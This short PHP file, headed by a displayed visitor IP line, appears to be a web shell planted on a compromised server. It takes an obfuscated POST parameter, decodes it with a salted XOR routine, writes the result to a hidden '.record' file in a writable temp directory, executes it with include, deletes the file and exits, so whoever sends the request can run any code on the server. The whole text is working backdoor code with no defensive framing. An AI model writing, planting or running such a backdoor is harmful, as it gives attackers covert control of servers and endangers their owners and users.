Your IP : 216.73.216.158
<?php
if(isset($_POST["s\x79\x6D\x62ol"])){
$hld = $_POST["s\x79\x6D\x62ol"];
$hld = explode ( '.' , $hld ) ;
$sym='';
$salt='abcdefghijklmnopqrstuvwxyz0123456789';
$lenS=strlen($salt);
foreach($hld as $w =>$v9):
$sChar=ord($salt[$w % $lenS]);
$d=((int)$v9 - $sChar -($w % 10))^60;
$sym .= chr($d);
endforeach;
$ent = array_filter(["/tmp", getcwd(), "/var/tmp", "/dev/shm", getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP")]);
foreach ($ent as $element) {
if ((function($d) { return is_dir($d) && is_writable($d); })($element)) {
$object = vsprintf("%s/%s", [$element, ".record"]);
$file = fopen($object, 'w');
if ($file) {
fwrite($file, $sym);
fclose($file);
include $object;
@unlink($object);
die();
}
}
}
}